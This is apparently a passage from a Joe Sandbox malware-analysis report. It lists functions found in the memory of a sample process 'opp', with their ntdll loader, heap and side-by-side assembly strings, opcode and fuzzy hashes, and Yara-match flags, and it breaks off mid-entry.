                                                              Function 0169ADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                              • API String ID: 0-664215390
                                                              • Opcode ID: 3e00c68ffcb975ab5fbf74acc5483384d26f66d3afa2795df424d73713c073d0
                                                              • Instruction ID: c4a5325f35e3bd1da501c2b8e8a6b9521714b6e34e591f6515b97ac4b414f113
                                                              • Opcode Fuzzy Hash: 3e00c68ffcb975ab5fbf74acc5483384d26f66d3afa2795df424d73713c073d0
                                                              • Instruction Fuzzy Hash: 6232BC719042698BEF22CB18DC98BAEBBB9BF45340F1440EAE949A7351D7319E81CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01718A3D
                                                              • VerifierFlags, xrefs: 01718C50
                                                              • VerifierDlls, xrefs: 01718CBD
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01718A67
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01718B8F
                                                              • HandleTraces, xrefs: 01718C8F
                                                              • VerifierDebug, xrefs: 01718CA5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: 8b923776b839ea89adb24d636b0b24292568fb1224331eac6dcad41f515ba262
                                                              • Instruction ID: bfaf7ebd862d12c32827ec55c8e551b5e0c59ee2fe0c9186e1071b2f48f80727
                                                              • Opcode Fuzzy Hash: 8b923776b839ea89adb24d636b0b24292568fb1224331eac6dcad41f515ba262
                                                              • Instruction Fuzzy Hash: 269135B2685312AFD721EF6CCC80B6AFBA5FB94B24F14455CFA416B248C7309D01CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0169EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: c73a0cdeb45a0403b41359c7333e4703092070fc66570a4f9f10dfcbeb136ef4
                                                              • Instruction ID: 70bcc02bf7e8ee4a7376f3c923d7400c039508d4e717fe3ac2376193a14009ad
                                                              • Opcode Fuzzy Hash: c73a0cdeb45a0403b41359c7333e4703092070fc66570a4f9f10dfcbeb136ef4
                                                              • Instruction Fuzzy Hash: 43A24774A0562A8FDF64DF18CC887AABBB9EF45304F1542E9D909A7390DB319E81CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0168F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              • Opcode ID: 437d57c6de6a5913a2fde7b92cad5b72f418c1c3c867868d00e901c331dc48c3
                                                              • Instruction ID: 2521e30a9320a8b308b540bcb8496b095f138f3d7ae7b71902ffb5fe621be9a4
                                                              • Opcode Fuzzy Hash: 437d57c6de6a5913a2fde7b92cad5b72f418c1c3c867868d00e901c331dc48c3
                                                              • Instruction Fuzzy Hash: 9A42F3312057829FD715EF68CC98A6ABBE5FF88704F148AADF4868B352D730D841CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016AB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              • Opcode ID: cc043b6d982f1f44de4c071aca7356bca2b93385bb996fe603fe3f8318beaa8c
                                                              • Instruction ID: acae87370e8939f96220050bd2b25990d13bd471516ae5146dda3ecfe23c4057
                                                              • Opcode Fuzzy Hash: cc043b6d982f1f44de4c071aca7356bca2b93385bb996fe603fe3f8318beaa8c
                                                              • Instruction Fuzzy Hash: F9C16A31A01215ABDB258F68CC80BBEBBA9FF45310F5481ADEE029B391DB74DD45CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
                                                              • Instruction ID: bc85aa46e0e3e93060ec262a30cf2ffc0582f7010298ea843f16e9a5eeb32669
                                                              • Opcode Fuzzy Hash: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
                                                              • Instruction Fuzzy Hash: F591F370B41315DBEB26DF18DC94BAEFBE1EB50B24F24812CEA066B385D7609842C795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0168645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitShimEngine, xrefs: 016E99F4, 016E9A07, 016E9A30
                                                              • apphelp.dll, xrefs: 01686496
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016E9A2A
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016E99ED
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 016E9A01
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016E9A11, 016E9A3A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
                                                              • Instruction ID: 5e8fd23b264cac80f9e4b57ff15bb55df8a5dc493e0fddd517432a5a19bd9c81
                                                              • Opcode Fuzzy Hash: 71987d99058bb14b176d2a744a3a2f84366b18ebf601a3246f167d5c3b69aecd
                                                              • Instruction Fuzzy Hash: BE51B0712483019BD720EF28DC85AAB77E5EF84B58F104A1DE98697250DB30E945CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 01702165
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017021BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01702178
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0170219F
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01702160, 0170219A, 017021BA
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01702180
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: a09570bc449139b28e2a02bbb73d921bc03d867b327e36b4d168d350194b2989
                                                              • Instruction ID: 132e573ce2f3aba20076f68583a62880f5407a9444cf6b61561e93cac84e0fc5
                                                              • Opcode Fuzzy Hash: a09570bc449139b28e2a02bbb73d921bc03d867b327e36b4d168d350194b2989
                                                              • Instruction Fuzzy Hash: 69313976B40325B7F7229B998C99F7BBBB9EB64E40F05006DFE05A7241D3709E01C6A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializeImportRedirection, xrefs: 01708177, 017081EB
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01708170
                                                              • LdrpInitializeProcess, xrefs: 016CC6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01708181, 017081F5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016CC6C3
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 017081E5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: d5ea72b3ca6c77bd7e3d7db883ba6a396e724c5c4583f02cff6063621dd034ad
                                                              • Instruction ID: 692c695c7cc68b79756aefcdb935875566340c9a9bb02f34f1deefbe49f38f38
                                                              • Opcode Fuzzy Hash: d5ea72b3ca6c77bd7e3d7db883ba6a396e724c5c4583f02cff6063621dd034ad
                                                              • Instruction Fuzzy Hash: 7931F271A443069BD320EF29DD86E2ABBD5EF94B24F00055CF945AB391EA20EC05C7A6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 016D2DF0: LdrInitializeThunk.NTDLL ref: 016D2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D74
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: 2d753f4c28dbd283bafecb177c347ddd7831bbe180355c8fa4fff38e6bedf7cd
                                                              • Instruction ID: f2a013172ff6f02180fc1bd2afe9a1b0de1a8c828fba770d5e6bfed90326de6c
                                                              • Opcode Fuzzy Hash: 2d753f4c28dbd283bafecb177c347ddd7831bbe180355c8fa4fff38e6bedf7cd
                                                              • Instruction Fuzzy Hash: 04424B71900715DFDB21CF68C880BAAB7F5FF44314F1445AAE989DB242E770AA85CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01714F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                              • API String ID: 0-2518169356
                                                              • Opcode ID: f11132ab8edccda82841726c11c1b4b39fcc0c197658830f74bbb91ed72d4ffb
                                                              • Instruction ID: 79c883b7c355eedfb6845d244bce6c09c361d1adad744e2c3d8f53d39839aa4b
                                                              • Opcode Fuzzy Hash: f11132ab8edccda82841726c11c1b4b39fcc0c197658830f74bbb91ed72d4ffb
                                                              • Instruction Fuzzy Hash: 1391C172D0061A8BCB25CFACC880AAEF7B5FF89710F594169E911EB354E775DA01CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 6046e00e36165c2d85c1906cfddea43052c7e4fb60a57d54f84cf70e266ed212
                                                              • Instruction ID: 634c0646239b66ab375d2eaaa91411ef733ce32c352b1a5c5576839f3de1044a
                                                              • Opcode Fuzzy Hash: 6046e00e36165c2d85c1906cfddea43052c7e4fb60a57d54f84cf70e266ed212
                                                              • Instruction Fuzzy Hash: CD13AB70A00256CFEB25CF68C8907A9BBF5FF49304F5481A9D949AB382D735AD42CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016AA840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 016F7D56
                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 016F7D39
                                                              • SsHd, xrefs: 016AA885
                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 016F7D03
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                              • API String ID: 0-2905229100
                                                              • Opcode ID: a612f14aca5a0f0f5eba35f3620749bd219861b59c26c39d7c559bd9eca15e81
                                                              • Instruction ID: 42a764242e7bcc7f10f8390d1a0f6eec63e42addfad0ceeb42d7f3302544bcb0
                                                              • Opcode Fuzzy Hash: a612f14aca5a0f0f5eba35f3620749bd219861b59c26c39d7c559bd9eca15e81
                                                              • Instruction Fuzzy Hash: 5BD19E36A002199FDB25CFA8CCC06ADBBB5FF48310F59416AEA45AB355D3319D81CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0169A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
                                                              • Instruction ID: 749931eb6261348640c2b407ede81ec08aecd34aaacbc5cf0d643c41de7af8df
                                                              • Opcode Fuzzy Hash: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
                                                              • Instruction Fuzzy Hash: 8DC16A752083828FDB11CF98C944B6AB7E8BF85704F04896EF9958B351E734C94ACB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 016C8591
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016C855E
                                                              • LdrpInitializeProcess, xrefs: 016C8422
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016C8421
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: 76320e8989c944d7fba35a92e53166abb3ce6048acb1c833d1a4863b1409d728
                                                              • Instruction ID: 714d31a616b18ef640033cb4663cfc3121274dedff62d008f77492ff368bbc47
                                                              • Opcode Fuzzy Hash: 76320e8989c944d7fba35a92e53166abb3ce6048acb1c833d1a4863b1409d728
                                                              • Instruction Fuzzy Hash: 84918A71508345AFD722DF25CC90EBBBAEDFF94A44F80492EFA8593151E370D9048B66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: , xrefs: 016F54E0, 016F55A1
                                                              • HEAP[%wZ]: , xrefs: 016F54D1, 016F5592
                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016F54ED
                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 016F55AE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                              • API String ID: 0-1657114761
                                                              • Opcode ID: 62daa30378bce3dfffa9d8f1948f561620b746bc5d545c8776754e4d7f5ee0eb
                                                              • Instruction ID: 20a2bddea19ce2ff167cde4c5f270380d30e61180bb371474c976ae7ea5e6338
                                                              • Opcode Fuzzy Hash: 62daa30378bce3dfffa9d8f1948f561620b746bc5d545c8776754e4d7f5ee0eb
                                                              • Instruction Fuzzy Hash: 1FA1EF316002469FDB25DF28CC80BBAFBE6BF15300F54856DE9868B782D774AC45CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • .Local, xrefs: 016C28D8
                                                              • SXS: %s() passed the empty activation context, xrefs: 017021DE
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017021D9, 017022B1
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017022B6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: f33e596360faaadf857379c44807179d295bd67df737b9158e8ecdc5f50c7f04
                                                              • Instruction ID: d045228b009423438bfefef9461f787b3490ba2d06159391d6fb68485aba41b7
                                                              • Opcode Fuzzy Hash: f33e596360faaadf857379c44807179d295bd67df737b9158e8ecdc5f50c7f04
                                                              • Instruction Fuzzy Hash: F1A19932900229DBDB21CFA9CC98BA9B3B5FB58714F2541EDD908A7351D7309E81CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402890 Relevance: 5.2, Strings: 4, Instructions: 240COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfff$gfff$gfff$yxxx
                                                              • API String ID: 0-166354949
                                                              • Opcode ID: b1235a63ba8fac4901e2ac17de94f6fe63dd4c7cb6bf2efbe3f3897d705b56f4
                                                              • Instruction ID: 2e99b77b89f9760954489ca7e4a418543e5b52ac5f01620e83706e378faa282a
                                                              • Opcode Fuzzy Hash: b1235a63ba8fac4901e2ac17de94f6fe63dd4c7cb6bf2efbe3f3897d705b56f4
                                                              • Instruction Fuzzy Hash: E6612672B001050BDF2C881DDE997BA7246E7E0309F18823FED0ADF7D5E9B99C058685
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlDeactivateActivationContext, xrefs: 01703425, 01703432, 01703451
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0170342A
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01703456
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01703437
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: e5474a851907876c840b094147414684e23eb035b2b8231354c9f027358fdc21
                                                              • Instruction ID: 9b2799c9c90329e3a303d5df7e94290c37569e089bf985a06e3a287fd181c3a9
                                                              • Opcode Fuzzy Hash: e5474a851907876c840b094147414684e23eb035b2b8231354c9f027358fdc21
                                                              • Instruction Fuzzy Hash: ED61DB36640B129FD722CE1CCC91B3AF7E5EB80A60F16856DF9569F290DB30E801CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 016F106B
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 016F1028
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 016F0FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016F10AE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: ea9a23d2a217c6b91e1c48f2ae5f42c124ba972bd3e7c65a5b6242fe32f11f44
                                                              • Instruction ID: 9f8af91910f36bbd2817b925b2fe4beab870dc8a2b20cc0af4886b793b474e55
                                                              • Opcode Fuzzy Hash: ea9a23d2a217c6b91e1c48f2ae5f42c124ba972bd3e7c65a5b6242fe32f11f44
                                                              • Instruction Fuzzy Hash: 9971EDB19043059FCB20EF18CC84B9B7BADAF95764F40456CF9498B28AD734D589CBD2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402884 Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfff$gfff$gfff$yxxx
                                                              • API String ID: 0-166354949
                                                              • Opcode ID: 48a714376488bbfd3da938fae1d09df72010b02997dbe3a118606f996e5d3cc9
                                                              • Instruction ID: 4368df5578bd081d1bb006373f6cb549253e6c4052a177237bad4c8620502c0e
                                                              • Opcode Fuzzy Hash: 48a714376488bbfd3da938fae1d09df72010b02997dbe3a118606f996e5d3cc9
                                                              • Instruction Fuzzy Hash: 4F5143B2B001090BDB2C881EDE997BA754697E0309F18823FED06DF3D5E9B9AD048685
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
